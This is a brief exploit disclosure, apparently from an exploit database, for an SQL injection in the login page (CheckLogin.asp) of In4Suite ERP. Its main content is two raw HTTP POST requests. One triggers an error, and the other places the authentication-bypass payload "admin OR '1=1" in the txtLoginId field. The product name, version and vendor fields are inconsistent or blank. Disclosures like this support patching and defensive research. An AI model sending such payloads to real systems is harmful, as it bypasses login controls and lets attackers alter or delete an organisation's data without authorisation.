Authored by Gulab Mondal

In4Suit ERP version suffers from a remote SQL injection vulnerability.

# Exploit Title: In4Suit ERP - 'txtLoginId' SQL injection
# Date: 18/05/2021
# Exploit Author: Gulab Mondal
# Vendor Homepage:
# Version: In4Suite ERP
# Tested on: Windows


SQL injection in In4Suite ERP allows remote attackers to
modify or delete data, causing persistent changes to the application's
content or behavior by using malicious SQL queries.


# Error condition
POST /CheckLogin.asp HTTP/1.1

txtLoginId=admin&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" "

# SQL Injection exploitation
POST /CheckLogin.asp HTTP/1.1

txtLoginId=admin OR '1=1&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt="